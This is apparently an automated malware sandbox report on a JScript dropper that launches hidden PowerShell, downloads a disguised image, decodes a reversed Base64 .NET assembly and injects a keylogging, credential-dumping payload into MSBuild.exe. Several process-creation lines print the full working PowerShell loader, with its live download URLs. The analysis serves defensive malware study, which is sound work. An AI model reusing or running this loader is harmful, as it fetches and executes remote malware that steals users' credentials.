                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,10_2_004198C2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1595
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1725
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5575
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4199
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 5651
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: threadDelayed 3836
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Window / User API: foregroundWindowGot 1768
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_10-53841
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API coverage: 9.6 %
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6300 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6512 Thread sleep count: 5575 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6516 Thread sleep count: 4199 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6580 Thread sleep time: -15679732462653109s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7128 Thread sleep count: 188 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7128 Thread sleep time: -94000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6956 Thread sleep count: 5651 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6956 Thread sleep time: -16953000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6956 Thread sleep count: 3836 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6956 Thread sleep time: -11508000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,10_2_0040B335
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,10_2_0041B42F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,10_2_0040B53A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0044D5E9 FindFirstFileExA,10_2_0044D5E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,10_2_004089A9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00406AC2 FindFirstFileW,FindNextFileW,10_2_00406AC2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,10_2_00407A8C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,10_2_00418C69
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,10_2_00408DA7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,10_2_100010F1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_10006580 FindFirstFileExA,10_2_10006580
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0040AE51 FindFirstFileW,FindNextFileW,11_2_0040AE51
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407EF8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407898
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,10_2_00406F06
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_00418981 memset,GetSystemInfo,11_2_00418981
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: wscript.exe, 00000000.00000003.2992022759.00000137F149C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2991947390.00000137F1481000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2993556266.00000137F14A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                      Source: wscript.exe, 00000000.00000003.2992022759.00000137F149C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2991947390.00000137F1481000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2993556266.00000137F14A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2993715210.00000137F3352000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3633339065.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3635314112.0000000000F69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: bhvFC84.tmp.11.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI call chain: ExitProcess graph end nodegraph_10-54374
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_0043A65D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,10_2_0041BCE3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00442554 mov eax, dword ptr fs:[00000030h]10_2_00442554
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_10004AB4 mov eax, dword ptr fs:[00000030h]10_2_10004AB4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00410B19 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,SetLastError,SetLastError,10_2_00410B19
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00434168
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_0043A65D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00433B44
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00433CD7 SetUnhandledExceptionFilter,10_2_00433CD7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_100060E2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_10002639
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_10002B1C

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Windows\System32\wscript.exe | Network Connect: 151.101.193.137 443
                      Source: Yara match | File source: amsi64_6372.amsi.csv, type: OTHER
                      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7116, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6372, type: MEMORYSTR
                      Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $forsakers = '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
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_00417245 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError | 10_2_00417245
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and write
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and write
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: execute and read and write
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 457000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 470000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 476000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 47B000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: B3C008
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe | 10_2_00410F36
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_00418754 mouse_event | 10_2_00418754
                      Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" C:\Windows\Temp\???2????4????4????5.js
                      Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $forsakers = '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
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = New-Object System.Net.WebClient;$immemorially = $conenoses.DownloadData($memorandums);$ed = [System.Text.Encoding]::UTF8.GetString($immemorially);$resentive = '<<BASE64_START>>';$overpack = '<<BASE64_END>>';$walled = $ed.IndexOf($resentive);$highlighted = $ed.IndexOf($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.Length;$legatine = $highlighted - $walled;$meteoritic = $ed.Substring($walled, $legatine);$orcas = -join ($meteoritic.ToCharArray() | ForEach-Object { $_ })[-1..-($meteoritic.Length)];$pervasivenesses = [System.Convert]::FromBase64String($orcas);$synizesis = [System.Reflection.Assembly]::Load($pervasivenesses);$vulcanisms = [dnlib.IO.Home].GetMethod('VAI');$vulcanisms.Invoke($null, @('0/tBcDi/r/ee.etsap//:sptth', 'constantan', 'constantan', 'constantan', 'MSBuild', 'constantan', 'constantan','constantan','constantan','constantan','constantan','constantan','1','constantan'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\hxihjvnzszludrvreijvqeqsb"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\rrvrknybgidhfxrdnswxtjkjbwnl"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\bmbkdyiuuqvmpdfhediqewfskcwuitz"
                      Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $forsakers = '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
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = new-object system.net.webclient;$immemorially = $conenoses.downloaddata($memorandums);$ed = [system.text.encoding]::utf8.getstring($immemorially);$resentive = '<<base64_start>>';$overpack = '<<base64_end>>';$walled = $ed.indexof($resentive);$highlighted = $ed.indexof($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.length;$legatine = $highlighted - $walled;$meteoritic = $ed.substring($walled, $legatine);$orcas = -join ($meteoritic.tochararray() | foreach-object { $_ })[-1..-($meteoritic.length)];$pervasivenesses = [system.convert]::frombase64string($orcas);$synizesis = [system.reflection.assembly]::load($pervasivenesses);$vulcanisms = [dnlib.io.home].getmethod('vai');$vulcanisms.invoke($null, @('0/tbcdi/r/ee.etsap//:sptth', 'constantan', 'constantan', 'constantan', 'msbuild', 'constantan', 'constantan','constantan','constantan','constantan','constantan','constantan','1','constantan'));if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };"
                      Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $forsakers = '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
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = new-object system.net.webclient;$immemorially = $conenoses.downloaddata($memorandums);$ed = [system.text.encoding]::utf8.getstring($immemorially);$resentive = '<<base64_start>>';$overpack = '<<base64_end>>';$walled = $ed.indexof($resentive);$highlighted = $ed.indexof($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.length;$legatine = $highlighted - $walled;$meteoritic = $ed.substring($walled, $legatine);$orcas = -join ($meteoritic.tochararray() | foreach-object { $_ })[-1..-($meteoritic.length)];$pervasivenesses = [system.convert]::frombase64string($orcas);$synizesis = [system.reflection.assembly]::load($pervasivenesses);$vulcanisms = [dnlib.io.home].getmethod('vai');$vulcanisms.invoke($null, @('0/tbcdi/r/ee.etsap//:sptth', 'constantan', 'constantan', 'constantan', 'msbuild', 'constantan', 'constantan','constantan','constantan','constantan','constantan','constantan','1','constantan'));if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };"
                      Source: MSBuild.exe, 0000000A.00000002.3635314112.0000000000F63000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerWK\e
                      Source: MSBuild.exe, 0000000A.00000002.3633339065.0000000000F43000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
                      Source: MSBuild.exe, 0000000A.00000002.3635314112.0000000000F63000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerWK\*
                      Source: MSBuild.exe, 0000000A.00000002.3633339065.0000000000F43000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager)
                      Source: MSBuild.exe, 0000000A.00000002.3635314112.0000000000F63000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerWK\04
                      Source: MSBuild.exe, 0000000A.00000002.3635314112.0000000000F63000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerWK\25
                      Source: MSBuild.exe, 0000000A.00000002.3635314112.0000000000F63000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerWK\/
                      Source: MSBuild.exe, 0000000A.00000002.3635314112.0000000000F63000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerWK\6
                      Source: MSBuild.exe, 0000000A.00000002.3635314112.0000000000F63000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerWK\
                      Source: MSBuild.exe, 0000000A.00000002.3635314112.0000000000F63000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerWK\*
                      Source: MSBuild.exe, 0000000A.00000002.3633339065.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3633339065.0000000000F34000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
                      Source: MSBuild.exe, 0000000A.00000002.3635314112.0000000000F63000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerWK\b5l
                      Source: MSBuild.exe, 0000000A.00000002.3633339065.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, logs.dat.10.dr | Binary or memory string: [Program Manager]
                      Source: MSBuild.exe, 0000000A.00000002.3633339065.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager:
                      Source: MSBuild.exe, 0000000A.00000002.3633339065.0000000000F43000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerZ
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_00433E0A cpuid | 10_2_00433E0A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: GetLocaleInfoA | 10_2_0040E679
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: EnumSystemLocalesW | 10_2_004470AE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: GetLocaleInfoW | 10_2_004510BA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP | 10_2_004511E3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: GetLocaleInfoW | 10_2_004512EA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW | 10_2_004513B7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: GetLocaleInfoW | 10_2_00447597
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW | 10_2_00450A7F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: EnumSystemLocalesW | 10_2_00450CF7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: EnumSystemLocalesW | 10_2_00450D42
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: EnumSystemLocalesW | 10_2_00450DDD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW | 10_2_00450E6A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
